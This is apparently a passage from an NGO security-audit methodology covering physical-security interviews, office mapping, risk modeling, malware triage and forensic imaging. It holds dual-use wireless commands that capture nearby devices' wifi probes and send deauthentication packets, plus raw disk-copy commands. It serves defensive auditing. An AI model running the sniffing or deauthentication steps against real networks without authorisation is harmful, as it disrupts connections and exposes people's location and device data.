This activity should build on the preparation work of the auditor, as well as the capacity assessment and context research work:

Once an initial interview or survey has taken place (as part of capacity assessment or dedicated to the above-mentioned questions), Send a follow-up request for any policies mentioned or referred to (travel policies, onboarding/offboarding policies for staff changes, personal device usage ("BYOD") policies, etc.). After reviewing those documents, request any additional policies those may refer to (general IT or security policies), and/or schedule a follow up interview or informal survey to dig deeper into remaining unanswered questions on the operatioal security situation of the organization as well as their adaptations to it. In the (likely) case where there are no policies governing these topics, the auditor can ask their points of contact for these discussions what the general practices are and expand and verify this through additional activities.

In creating new questions, be careful to not "lead" on security in a way that would discourage honest and transparent responses. For example, ask "Do you host community events and trainings?" instead of "Do you allow outside people into your office"?

Below are questions not already covered in the capacity assessment interview process, and after that selected questions from that process which are of particular use here.

Office layout and proximity concerns

Describe your office - is it on a floor of a building? An entire floor? (What level of the building?) How close are other buildings? Is it a shared, open office space or co-working space? (shared network? open access?)?

Has the organization dealt with robberies/theft, break-ins, or office raids? If so, what happened, when, and how did you respond (or do you have a policy or contingency plan? When was that last reviewed/updated?)

What other wifi networks can you see? (See https://wigle.net/ )

Physical Access Controls

Do you consider your office space to be secure?

Who has independent access to the office space, and routine after-hours access (i.e. who is able to unlock the space). This may include security, cleaning or other building service personnel.

Do you have policies and procedures for authorizing and limiting unauthorized physical access to digital systems and the facilities in which they are housed?

Describe the measures to restrict physical access to the following

Do your policies and procedures specify the methods used to control physical access to your secure areas, such as door locks, access control systems, security officers, or video monitoring?

Device Controls

Do you have procedures for physically securing portable devices such as laptops and mobile phones?

Do you have a key personnel responsible for the security of digital resources?

Do you have policies covering laptop security (e.g. cable lock or secure storage)?

Are there procedures to automatically lock digital devices if left unattended for sometime?

Emergency Planning

Do you have a business continuity plan in case of serious incidents or disaster to your digital resources and is it current?

Does your plan identify areas and facilities that need to be sealed off immediately in case of an emergency?

Are key personnel aware of the plan and how to respond to the emergency?

Programs and staff

Selected questions from the Capacity Assessment Interview, "Open Up" section:

From "Threat Information"

From the Technical Only section:

Recommendation

See recommendation section in the Guided Tour activity.

For useful organizational policy recommendations, review the SANS Information Security Policy Templates

Office Mapping

Summary

This activity seeks to identify potential physical vulnerabilities to an organization's information security practices by documenting the current physical layout of the office and the locations of key assets, as well as potential "external" risks such as nearby/shared office spaces.

This can be done in person independently or alongside the "Guided Tour" activity, and can also be done in advance of an assessment or remotely by a willing staff member who knows where these assets are located (often a technical or administrative staff person). This can also be conducted in a multi-office or home-office environment where the auditor is unable to visit every location.

Overview

In this activity, the auditor or the organization draws a map of the office space and notes locations of potentially valuable information or assets.

This activity can be paired with the Guided Tour activity, to reduce the awkwardness of taking notes while walking around the office during the Tour, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each. This can also be done by an organizational point of contact in advance to provide additional preparation for the auditor.

Materials Needed
Considerations
Walkthrough

Walk around the office and draw a map of the floor-plan (do not rely upon memory). Consider taking photos of specific areas (e.g. confusing layouts or areas difficult to capture in drawing). Make notes of where intruders could gain access to the office, where sensitive data may live (in the executive director's desk, in a storage closet, on devices), and relevant other items. Also note the overall privacy that the office provides (is it a shared office space, shared building, etc.)

Note the locations of any of the following that apply:

If doing this activity remotely and/or in advance of an audit, it may be useful to have multiple staff members independently draw maps and to provide the organization with additional guiding questions:

Recommendation

See recommendation section in the Guided Tour activity.

Scavenger Hunt

Summary

This activity assists in identifying potential physical security concerns at an organization, particularly when an auditor cannot travel to the office location or cannot visit every office location. The scavenger hunt approach is focused on involving the organization staff members into mapping out potential threats based on the abstraction and the gamification of the physical security mapping process. See the "Risk Hunting" exercise in SaferJourno, page 19, for additional ideas and guidance on conducting this activity.

Overview

A local facilitator is required to lead this "scavenger hunt" where staff members seek out potential physical security challenges themselves. This activity should only be conducted within an environment with a high level of trust and consent. The auditor should get the agreement from the host NGO to involve all staff members into the exercise to avoid causing trust issues. By involving the staff members in identifying physical security risks, you are also taking a step forward to increase awareness on these issues.

With facilitation, staff members will explore their own office looking for potential physical security risks and share results. To reduce the risk of individual staff embarrassment, they will first review their own working space and secure it before looking around other parts of the office. The facilitator, in consultation with the auditor and the organizational point of contact may declare some areas "off limits"

Materials Needed
Considerations
Walkthrough

The auditor should first meet with the facilitator (possibly over secure videochat) to brief them on the activity and map out potential challenges (particularly around trust, organizational hierarchies, and any potential repercussions).

The auditor then prepares a checklist of physical vulnerabilities with the facilitator, based on the current understanding of the organization's assets and the context they are operating within. The auditor, facilitator, and organization point of contact should decide if any areas are "off limits." Note that this is only a list of a suggestions. As with the "Risk Hunting" exercise in SaferJourno, and it should be modified to fit the requirements, assets, and threats the organization faces:

At the organization, the facilitator explains the activity to the organization members. To balance the need for consent with the benefits of identifying actual daily practices which may need improvement, the staff should already be aware that examining physical devices is part of the audit scope, but not the specific activity. Staff will be able to first identify and address their personal concerns before others.

Recommendation

(See "Guided Tour")

Monitor Open Wireless Traffic

Summary

It can be valuable to to listen to broadcast wireless traffic at the physical office location, even before knowing anything about the organization's network itself. This outside, passive information gathering can reveal a surprising amount of data on not only what devices are connecting to which networks, but also what type of devices they are (based on their unique MAC addresses), and what other networks those devices have historically connected to. These probes can reveal personal, organizational, locational, and device information that, taken in context, can be dangerous or lead to other vulnerabilities.

Overview

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

Materials Needed
Considerations
Walkthrough
Step 1: Monitor Mode

You should disconnect from any wifi network you may be connected to to capture the widest amount of data.

Switch your wireless adapter to monitor mode**

$ airmon-ng start <interface>

You may need to stop your network manager system to prevent it from interfering. Running

$ airmon-ng check

to list anything that is causing problems, and

$ airmon-ng check kill

to try and stop them automatically, and running stop network-manager && stop avahi-daemon may keep them from re-starting automatically.

Step 2: Listen for wifi probes.

Run airodump-ng on the monitor mode interface (usually mon0). This listens to wifi beacons and you can begin analyzing who is on what network, and see historical networks.

airodump-ng -w filename mon0

This scans all networks and channels, collecting broadcast network information. Note that, despite its broadcast nature, this is privacy invasive and can be considered illegal: http://www.slate.com/blogs/future_tense/2013/09/16/google_street_view_wi_fi_snooping_case_good_news_and_bad_news.html . You can restict this to a specific channel or base station ID (BSSID) with -c and --bssid:

airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w filename mon0

Step 3: de-auth (optional)

Send de-authentication packets to force clients to reconnect and send out additional probes. Take note that by its very nature, de-authentication causes annoying interruptions to wifi traffic. This breaks connections, drops skype calls, and can make the wireless network temporarily unusable -- Make sure to check with staff before going through this (to make sure no one is doing a live webcast or on an important VOIP call, and to expect some network instability).

$ aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

 15:54:48  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AA:BB:CC:DD:EE:FF] [ 5| 3 ACKs]

This command de-authenticates one targeted user with one attempted deauth packet. "-0 10" would try 10 times (potentially disconnecting the user multiple times!). With permission, you can also target all users on a network by leaving out the "-c ..." flag.

There are scripts, like wifijammer, which use this same approach to jam all wifi connections in range of the attacking computer, so check against the documentation at http://www.aircrack-ng.org and act responsibly to protect yourself and the organization.

Step 4: MAC Address Research

The first three hex numbers of each MAC address designate the vendor, which can reveal useful information in matching MAC addresses to devices. The MAC address is a unique identifier, so never post or search using the full address. Note that increasingly, devices are using MAC address randomization, but if it implemented, it often is poorly implemented against even minimally determined adversaries, as per this 2017 research study.

To compare found MAC addresses to the bendor database offline you can download the full vendor database from IEEE or use the Wireshark list

Step 4: Ongoing Monitoring

The longer you leave this running (particularly when staff are first entering the office or returning after lunch/meetings), the better sense of what devices are connected to the network you will get.

Watch what probes the various devices are sending out (especially when they are deauthenticated, as above). You will see each computer on the network, as identified by their mac addresses, broadcast information about previous networks to which they have connected.

BSSID              STATION            PWR   Rate    Lost    Frames Probe

00:11:22:33:44:55   0F:3E:DF:DA:2D:E2   -67 0   0   234567  SampleOrg,linksys¸John Smith's iPhone,Free Public Wifi
00:11:22:33:44:55   F8:7E:FC:03:CC:43   -80 -24 0   234567  amygreen,SampleOrg,android-hotspot,Starbucks,united_club,Dulles Airport WiFi
00:11:22:33:44:55   F8:19:F3:DF:75:19   -58 -54 0   234567  SampleOrg
00:11:22:33:44:55   38:08:95:EB:7E:0B   -75 -12 0   234567  HolidayInn,SampleOrg,John Smith's Mac mini,android-hotspot
Recommendation
Recommendation: Cleanse wifi network connection history

For most devices, deleting networks from the “saved” network list will stop them from being probed. Obviously, this can be an annoyance for networks you regularly connect to, so renaming these networks to non-revealing names would help, as would creating non-name-associated “guest” networks for colleagues connecting to your home network.

On iPhones and iPads, it is not possible to selectively remove historical networks unless you are currently in range of that network. It is however possible to remove all history: go to Settings > General > Reset > Reset Network Settings . When you take this step, it is worth going through this reset multiple times – approximately once per year of device ownership, as the first reset appears to only remove recently-connected networks, and older networks will be broadcast.

Recommendation: Use innocuous network names

Organizations may want to choose innocent or generic network names, and/or not broadcast network names. It is worth noting that devices seeking out hidden networks will "beacon" for the actual network name, so this has extremely limited security use and must be combined with other protective measures. See this Acrylic blog post for further details.

It is worth noting that wifi access points are also tracked to assist in location services, and as such the location of a wireless network can be learned from its name or the MAC address of the access point. WiGLE is a community-managed database for such information, but both Google and Microsoft, and likely many others, also track this locational information, so the opt-out information below is only minimally useful.

Removal options: See wikipedia for public listings. Some opt-out options exist below:

Wireless Range Mapping

Summary

This component allows the auditor to show the "visibility" of an organization's wireless network to determine how far the organization's wireless network extends beyond a controlled area. Wireless networks are often trusted as equivalent to the hardwired office networks they have largely replaced, but they have important differences. Wireless networks are often "visible" from outside the walls of the office - from common spaces or even the street. Without further access, this reveals a wealth of information about the organization's size and the type of devices connecting to their network.

Overview

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjuction with Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

Materials Needed
Considerations
Walkthrough

Map the range of the organizations wireless network outside of office space, using wifite or other tools to track network strength.

A variety of apps and tools can support this work without resorting to professional "wifi site survey" tools. If the Office Mapping exercise has taken place, that map can serve as the starting point to expand the map outside the office. If using a third party tool or app, ensure that the app is not sharing sensitive data. Using simple signal strength monitors in combination with location notes is more than sufficient. In Linux systems, one can use wavemon, kismet, wifite, and even the networkmanager command line tools to track visible networks and their strengths as described on StackExchange:

watch  "nmcli -f "CHAN,BARS,SIGNAL,SSID" d wifi list ifname wlx10feed21ae1d  | sort -n"
Recommendation

Depending on office layout, moving the wireless access point may help to reduce how far the network is transmitted outside of the office space, and changing devices which do not move to better enable this without loss of functionality.

See also Monitoring Open Wireless Traffic recommendations and Network Access security recommendations.

A Day in the Life

Covered in full in User Device Assessment:

A Night in the Life

Covered in full in User Device Assessment:

Process Mapping and Risk Modeling

Summary

This component allows an auditor to lead the host organization's staff in a series of activities to identify and prioritize the processes that are critical for the organization to carry out its work. These activities will also reveal the consequences if those critical processes were interrupted or exposed to a malicious actor. This results in the staff creating a risk matrix which is used as the foundation of the auditor's recommendations.

Purpose

Having the host organization central to the risk assessment process allows the auditor to put their threats and recommendations into the host's own narrative. With greater ownership of the process the staff will be more engaged in addressing the threats identified when the audit is complete. 77 By engaging as many staff as possible the auditor also is providing a framework for staff to examine future concerns when the auditor is gone. The existing in/formal security practices captured during this process will be used to remove organizational and psyco-social barriers to starting new practices.

The Flow of Information

Risk Modeling Information Flow
Risk Modeling Information Flow

Guiding Questions

Approaches

Note: Risk modeling will require a mixed approach of exercises, and the order which you identify each component will vary depending upon the organization.

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Outputs

Operational Security

Preparation

Resources

Threat Modeling Resources (General)

Risk Assessment Activities

Threat Assessment Activities

Example text for introducing threats - Integrated Security

Written exercise: Threats assessment - Integrated Security

Facilitators Manual (With PDF download of "Threat Introduction Example Text" and "Threat Assessment Written Exercises") - Integrated Security

Analyzing Threats: Chapter 3 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Risk Matrix Activities

Risk Assessment: Chapter 2 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Alternative Risk Modeling Activities

Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Activities

Process Mapping

Summary

This activity helps to identify the processes that allow the organization to function (publishing articles, payments, communicating with sources, field work etc) the assets and systems (websites, software, PayPal accounts) they rely on, and which ones are critical to their work.

Participating organization/s are asked to "brain-storm" a list of all the processes that are critical for their work and the auditor works to map the details of critical processes out to expose points of risk.

If done correctly, process mapping can help the auditor - Identify risk exposure - Communication issues and effective incident response - Identify what are affected (people, systems, technologies) - Identify areas of improvement in securing organization's process - Generate a mitigation/solution plan for missing security controls - Show the importance of digital security to staff, management team and stakeholders

Overview

Remember that in any process mapping session, participants may bring up exceptions and errors. Adding digital only makes things more complicated and messy. In order to manage your time effeciently and not end up discussing issues and solving them during session, you must:

  1. Be firm with your goal.
    • Map out the current overall process first
    • Manage and control your audience by limitating discussion over insignificant topics
    • List all issues and errors and review them later
  2. Balance active facilitation with taking time to look for weaknesses
    • A background in digital security helps you as an auditor to identify possible ways how you one can exploit a weak processes. While largely letting the organization drive the process creation, ask targeted questions to fully expose the full extent of a critical process and keep an eye on ways the processes could be vulnerable. If this is your way of thinking, you may already be formulating ideas on how to mitigate those attacks and give the best recommendation according to their process.

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Materials Needed
Considerations

This activity contains significant information about the internal process of an organization, and requires proper documentation and secure handling. If this information is leaked, it will expose the organization's process weaknesses. If destroyed without backup, will require you to redo all the steps and activities you have done in the past wasting precious time.

Walkthrough

NOTE: If an auditor does not ensure that the uniquely identified subset of processes speaks to the full range of participants, their recommendations are more likely to be met with resistance.

While doing this it is important to consider level of detail you will be mapping out (this should be pre-determined or established so everyone is on the same page). You will generally want to capture:

Recommendation

Process mapping is simply documenting the steps in a certain process or simply an inventory of why you do the things that you do. It is your job as an auditor to map the organization's existing process in order to achieve sound judgement in providing digital security recommendation or solution.

This activity can sometimes lead to hopelessness, or challenge; it is important to remind the staff that any risk can be mitigated, and indeed it is the goal of an audit to identify the highest priority ones based on actual likelihood and provide guidance on mitigation.

Risk Modeling Using the Pre-Mortum Strategy

Summary

The pre-mortum strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan." 78.

Overview
Materials Needed
Considerations
Walkthrough

Prepare a flipchart / space on the white-board to keep track of process', threats, impacts, and adversaries that are identified during other activities. Participants can easily get ahead of the process as they explore individual ideas. Keeping a space for these "upcoming" activities will help re-center them on the activity at hand.

Pre-Mortum Strategy: (30 Minutes) The pre-mortum strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan." 79

Process/Interaction Mapping (30 minutes per process):

NOTES: * You can add follow-on processes to examine if they are identified as critical by the participants during this activity. Specifically, the exercises in the Threat Assessment section pair well. * Put people on post-its to make them able to be moved around. * Verbally walk the participants through the completed process so you ensure you didn't miss anything. * Take quick notes to remind yourself of any key points not clearly marked on the map before they move on to the next activity. * After completing all the key events take a photo of the whiteboard / store the chart-paper for later documentation.

Recommendation
This activity can lead to feelings of hopelessness as well as stir up direct fears or challenges that the staff face. It is important to remind the staff that any risk can be mitigated, and indeed it is the goal of an audit to identify the highest priority ones based on actual likelihood and provide guidance on mitigation.

Risk Matrix

Covered in full in Threat Identification:

Critical Data Activity

Covered in full in Data Assessment:

Self Doxing

Summary

Doxing (also "doxxing", or "d0xing", a word derived from "documents", or "docs") consists in tracing and gathering information about someone using sources that are freely available on the internet (called OSINT, or Open Source INTelligence).

Doxing is premised on the idea that "The more you know about your target, the easier it will be to find their flaws”. A malicious actor may use this method to identify valuable information about their target. Once they have found sensitive information, they may publish this information for defamation, blackmail the target person, or use it for other goals.

This activity aims to help participants identify any unwanted personal information that may be publicly available online, and to make them aware of the risk of doxing and how to prevent it.

Overview

Self-doxing:

This activity is aimed at showing the group how to research the data traces they leave online, as well as to improve the results of the Manual Reconnaissance activity with research carried out by individuals on themselves, which helps protect their privacy and makes results more detailed. With this approach, the auditor will only be informed about the results if mitigation steps such as takedowns are indicated.

Materials Needed
Considerations
Walkthrough
Recommendation

Responding to Advanced Threats

Summary

This component allows the auditor to be able to identify, triage, and analyze suspicious behavior on a device or in a network. Depending on the analysis, the auditor may need to further investigate a malware infection, analyze a binary and determine if it is malicious or not, and recommend urgent mitigation steps.

Purpose

It is very common to find suspicious behaviors, processes, traffic and other ‘weird activities’ during a SAFETAG audit. SAFETAG practitioners should always be on the lookout for suspicious activities as they apply other SAFETAG methods and their activities, from interactions and discussions with staff to hands-on device assessment and traffic analysis.

The Flow of Information

Information Flow
Information Flow

Guiding Questions

Approaches

Due to the limited window of time, the auditor should focus on identifying suspicious activities and triaging them rapidly. Many of these will be false positives related to other non-malicious software causing the machine to "act weird" or other types of less serious (and non-targeted) malicious software like adware or ransomware.

When this cannot be ruled out, collecting evidence, running basic research and analysis, and assessing the risk and impact against organizational priorities will help prioritize further action. In-depth binary analysis is best kept for post-audit work during the reporting and follow-up phases. If critical assets are compromised, the auditor might need to coordinate urgent mitigation measures with other IT experts.

Time management is extremely crucial when responding to potential malware infections and similar more advanced threats. If using this method, the auditor should constantly question whether to continue this process or complete other aspects of their audit plan. At the end of the audit process, not having an understanding of the organization's risk tolerance, existing capacity, current practices/processes/policies and existing informational assets will undermine the auditor's ability to provide a prioritized report or understand the context around the potentially malicious activity they have uncovered.

Outputs

The main outputs of advanced threats identification should be evidence like files, emails, screenshots and URLs included in messages or spotted in suspicious connections.

Operational Security

Preparation

Baseline Skills

Resources

Malware Analysis

Digital Forensics

Activities

Suspicious Activity Analysis

Summary

Malware is a common tactic to target organizations. Malware like a Remote Access Trojan (or RAT) can provide an attacker with backdoor access to a targeted machine, enabling the attacker to steal information, record audio and video, as well as run commands on the infected machine.

To stop this from happening, you have to identify the malicious process within the system and stop it, or reformatting the machine in case you don’t feel spending time on stopping the malicious process.

It’s important to keep evidence, in case the auditee still has access to the original malicious software they received (e.g., an email, etc.), keep a copy of the file if you have the time and expertise to continue investigating or have the resources to submit it to other organizations working on analyzing such issues.

Scanning the possible infected machine or the original suspicious file with an anti-virus will save you time and effort, in the case such malware is already in its database. Scanning should always be the first step, preventing you from spending excess time if the machine was infected with a less serious piece of malware.

After determining the machine is infected, you can proceed in helping the staff member back up their information, scanning the files for malware, then reformatting the infected machine. Note, it is very difficult to clean an infected machine if you only have a short window of time.

In case the machine was infected, taking an image of the operating system will allow you to replicate the infected machine and run it after you finish your audit for a more in-depth investigation or send it to an expert to work on investigating the malware. Note, this also can be difficult in an audit setting where time is limited. Also see operational security considerations that come with replicating the files of a staff member of a sensitive organization. Be sure this is absolutely necessary and the staff members provides consent before completing.

Overview

In the following, you should look for files and URLs that may indicate a compromise and may help you identify an infection. If you have time, some inital light research may be suggested to see if the URLs or files hashes have been identified by other security researchers which can help you provide more context to the organization around the types of threats they are facing.

Materials Needed
Considerations
Walkthrough

The next sections often are highly interrelated - a phishing email may include malicious URLs and/or files, network traffic may include URLs, URLs may try to send malicious file downloads.

Questions to ask the user / organization


Phishing or Suspicious Emails

If the organization staff has received suspicious communications, the first step should be to clearly warn the auditee that any associated files or links should not be opened.


Malicious Files

In this part, you will be investigating a file and determine if it’s malicious or not. The auditor will not have much time for this step, but a preliminary analysis (not longer than one hour) can be performed, following these instructions:

Include the hashes of the malicious files in the appendix of your assessment report.

If the organization was targeted with a more advanced attack, there will be a high probability that the attacker will use new or disguised malware -- which means no Anti-Virus will find it as malicious, in this case, and if you feel you still have doubts that a clean file is still malicious, submit it for in depth analysis.

In this step, you will be dealing with infected machine by one of the binaries you analyzed in step 1 and 2, or you are sure that the machine is infected and you have no time to analyze it. In this case, you will take a backup, migrate the data safely to a new machine and take a full image from the system and submit it for more in depth analysis.

See the Incident Response activity for additional details.

You will need at least one hour to prepare and carry the advanced investigation. this step is optional in case you have time and you think you still have doubts about the file and you need a more advanced result. In this step, you will analyze the suspicious file using Cuckoo Sandbox, an automated malware analysis system. In case you decided to go with this option, you will need an installed Linux on your audit machine you can use this Kali guide to install Kali Linux.


Suspicious URLs

You may have found suspicious URLs in your wireshark output during the traffic analysis, in the email content, in IMs, etc.

Capture the context in which the URL was sent to the user or used by a process (sender, timestamp including timezone, and any other identifying details).

If the URL was sent to the user through a message, ask them if they clicked the link.


Suspicious Processes

If you find suspicious open ports, follow the instructions in the Network Scanning activity section "How to decide if an open port is suspicious".

It can also be useful to follow these steps:

Windows, Mac, Android

Android, iOS

See the User Device Assessment and Mobile Device Assessment activities for more in-depth device analysis.


Unusual Network Traffic

Advanced threats may be identified during the network scanning and traffic analysis. See the Network Scanning and Traffic Analysis activities.


Threat Hunting

Threat Hunting In case you went through the entire process and still you have doubts about a file, email, process, or have other reasons to believe the organization may have undetected malware, you will probably need to work on specific threat hunting procedure that matches your needs, the organization's assets, and the threat profile of potential adversaries.

The ThreatHunting.net project, is collecting different Threat Hunting techniques on their GitHub repo.

The provided Threat Hunting procedures will guide on how to address your doubts on specific issue which means, you have to be able at least able to identify the category of the possible threat then apply the steps provided by ThreatHunting.net project.

Recommendation

Digital Forensics and Evidence Capture

Summary

This component briefs the tools and procedures required to acquire the image (live or dead, depending on the situation) and securely handle data from a device (laptop, desktop, HDD, memory stick, USB stick, etc.) that is needed to later perform a malware analysis or forensic evidence process.

Overview
Materials Needed

Skills Needed

Required software - depending on the data acquisition type and the operating system, you will need the following tools:

Additional materials

Considerations
Walkthrough

The Chain of Custody: How to handle forensic data

The Chain of Custody (often referred to as audit trail or chain of evidence) is the process of preserving the integrity of the digital evidence. Being able to maintain the Chain of Custody is very important for forensic evidence. This means that you need to record, and be able to prove, that authorized personnel were in control of the evidence at all times, and that no unauthorized person or device or mechanism could have altered the evidence while in our custody.

To maintain the Chain of Custody, it is imperative to carefully document what happens to the evidence. This means:

Live or Dead Imaging?

Different processes and tools are used depending on what kind of data acquisition and investigation will be done. However, in order to make a correct decision on how to get the forensic image, you should take into account the following questions:

Regarding the definitions, we call 'dead imaging', or 'offline imaging', the process of obtaining evidence from systems that are switched off and where no data processing is taking place, while 'live imaging', or 'memory imaging', refers to the process of making a bit-by-bit copy of memory in order to preserve the volatile data available in the device. There is a lot of information of evidentiary value that could be found in a live system. Switching it off may cause loss of volatile data such as running processes, network connections and mounted file systems. On the other hand, leaving a computer running may cause evidence to be altered or deleted. Therefore the investigator needs to decide what alternative is best in each given situation. Another approach is to use specialized tools to extract volatile data from the computer before shutting it down.


Variant: Live imaging tools and procedures

Windows: DumpIt

Brief description: DumpIt helps the user to get a memory dump in Windows systems. It is easy to use and it is possible to send the DumpIt.exe file to the victim in order to facilitate the data acquisition.

Source: in order to download DumpIt, you need to register here. Intructions can be found here.

How to use DumpIt:

Note: it is easier to provide DumpIt.exe directly to the client.

  1. Make sure you have more free space on the disk or the USB key you run the memory dump from
  2. Download DumpIt
  3. As it is an archive, extract it (right-click, extract)
  4. Connect the hard disk or USB key with DumpIt to the computer you want to do the memory acquisition from
  5. Double-click on the file
  6. A window will pop up. Read the message in the window: if the “Address space size” is bigger than the “Free space size”, you do not have enough space in the device. In that case, you should move DumpIt.exe to an empty USB key or SD card that is bigger than the “Address space size”
  7. If the space in the device is sufficient, hit ‘y’ and wait (it can take a very long time)
  8. Compress the memory dump in an encrypted archive. The best way is to use 7-ZIP, as Windows 7 does not support encryption.

MacOS: OSXPMem

Brief description: OSXPMem is a part of the pmem suite created by the developers of Rekall. Rekall itself is a very useful utility built for both memory acquisition and live memory analysis on Windows, Linux, and OS X systems.

Source:

How to use OSXPMem:

Download the latest release (the latest OSXPMem release is 1.5.1 Furka).

  1. Unzip the package

    $ unzip osxpmem.osxpmem-2.1.post4.zip

  2. The file ownership/permissions must be changed to “root:wheel”

    $ sudo chown -R root:wheel osxpmem.app/

  3. Run OSXPMem to collect memory from the local system

    $ sudo osxpmem.app/osxpmem -o OUTPUT_DIR/FILENAME.aff4

  4. Check the information acquired

    $ sudo osxpmem.app/osxpmem -V OUTPUT_DIR/FILENAME.aff4

  5. Extract the AFF4 memory image stream into a singular raw file for parsing/analysis by other tools

    $ sudo osxpmem.app/osxpmem -e /dev/pmem -o OUTPUT_DIR/FILENAME.raw OUTPUT_DIR/FILENAME.aff4

  6. Unload the kernel extension

    $ sudo osxpmem.app/osxpmem -u

  7. Check if your OS X has a memory profile available or create one if required, in order to do the analysis with the tool Volatility.

    You can check available profiles here

Note: You also have the option of including additional local files within the resulting AFF4 volume/file via the -i </path/to/file> -i </path/to/file> command line option(s), which can be useful in producing a singular output volume containing not only memory but other files (binaries/logs/etc.) you’d like to analyze as well.

Additional information:

Linux: LiME - Linux Memory Extractor

Brief description: Linux Memory Extractor (LiME) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android. The tool supports dumping memory either to the file system of the device or over the network.

Source:

How to use LiME:

  1. Download the LiME source code from the Github repository.
  2. Compile it using the Linux make command.
  3. The result will be the creation of a “.ko” file in the current directory, named lime-3.2.0-59-generic.ko.
  4. Move the USB to the suspect machine. Plug the USB extraction drive into the machine (assuming that it mounts successfully, otherwise you have to mount it yourself. This isn’t very forensically sound, but there’s not much choice here).
  5. Run the command:

    sudo insmod lime-3.2.0-59-generic.ko "path=/media/USBDriveName/myRAMDump.lime format=raw".

  6. It is important that you include both the path parameter and the format parameter in the command, otherwise you’ll get the “-1 invalid parameters” error. For Ubuntu you’ll need the quotes around the path and format parameters, while in other distributions like CentOS and RedHat you won’t need them.

Memory acquisition can be achieved from remote too. Instructions on how to do it can be found here.

Additional tools and procedures from different OSs and versions can be found here


Variant: Offline / Dead imaging tools and procedures

Dead or offline imaging (also known as disk acquisition) is the action of creating a forensic image of an entire disk, where the imaging process does not alter any data on the disk, and all data, metadata, and unallocated space are included. Details on how to do this (using CLI commands or a forensic distro) can be found in the section "How to Byte-Copy Data" below (instead of using an external medium as source device, the hard disk of the victim's device should be used).

Additional tutorials can be found here:

How to Byte-Copy Data

By "target" we will refer to the hard drive or data image already acquired. When explaining the use of commands, the "target" will be also referred to as "source device", while the place where the byte-copied data will be stored is referred to as "destination device". The forensic image that will be acquired with this process will be used to execute tests without affecting the original evidence received.

Files and device block labels for the examples

For the command examples, these name conventions will be used:

  1. Prepare destination media to be used to save the forensic image

    The forensic image that will be taken from the target should be saved in a proper labeled and formatted drive with available space greater that the size of the forensic image. Execute the actions described below before approaching the target.

    • Select an equally sized or larger hard drive or storage device to store the image
    • Properly label the destination media
    • Prepare an additional USB stick to collect a file log
  2. Capture the forensic image

    There are two ways to capture the forensic image:

    1. using a bootable Linux forensic distribution on a CD or USB stick (see "Using a Forensic distribution" below), or
    2. by command line (terminal). If possible, use the forensic distribution, as this method does not mount devices by default.

Using a Forensic distribution

In case you are using the forensic distribution, for example DEFT, boot the image by following these steps:

NOTE: in order to get the DEFT boot loader started, the BIOS of the system being analyzed should be set to boot from CD-ROM/DVD-ROM/BD-ROM or from external storage devices (depending on the media containing DEFT). In any other circumstances, configure the BIOS, save and restart the system either with the DVD already inserted in your CD/DVD drive or with the USB stick already connected. We recommend changing the boot order of the devices directly in the BIOS to prevent an accidental reboot of your PC (e.g. due to a power surge).

If it is not possible to use the forensic distribution's graphical interface, just open a command line terminal.

In the command prompt (bash shell in DEFT) enter the commands detailed in each step listed below.

Step 1: in order to keep the record of the procedure, a log file will be elaborated in a separate USB stick.

Step 2: Write-blockers to prevent alterations.

If you use the forensic distribution option, this step can be skipped. Otherwise, the following command should be entered to prevent any data from being written to the block device, allowing mounting of the block device with read-only access.

mount -o ro /dev/sdX  /mnt/sdX/

Other block devices (the USB stick for the log or the destination block device) can be mounted without taking this precaution.

Step 3: Byte-copy the data to a data image for forensic analysis purposes.

When all the data from a disk is duplicated exactly from the source disk and stored in a file, the resulting bit-for-bit copy is called a raw image. Raw images can be created by several different utilities and frequently will use the following file extensions: .dd, .raw, .img.

There are different tools available to obtain this raw image file. Which one we use will depend on which are available for our operating system, and which tool best suits our needs. These tools are listed below.

WARNING! Be extremely careful when typing the command line for this program. Reversing the if and of flags, or confusing the label of the device block related to the source or destination device will cause the computer to destroy the evidence! Therefore it is imperative to check and re-check (and preferably have someone else check) the command before executing it.

Please keep in mind that the if= flag refers to the input file, in this case, the source device or target and the of= flag refers to the output file or destination device.

Tools for bit-by-bit copy

Command flag clarification and examples

Tool Command Syntax
dd dd if=/dev/sdX of=/dev/sdY
dd if=/dev/sdX of=/dev/sdY/[IMAGENAME].img
dc3dd dc3dd if=/dev/sdX of=[IMAGENAME].img hash=md5 log=[LOGFILENAME].txt
ddrescue ddrescue /dev/sdX /dev/sdY/[IMAGENAME].img
dcfldd dcfldd if=/dev/sdX of=/dev/sdY/[IMAGENAME].img hash=sha1 (or hash=md5)
Recommendation

See Incident Response guidance.

Forensic Analysis

Summary

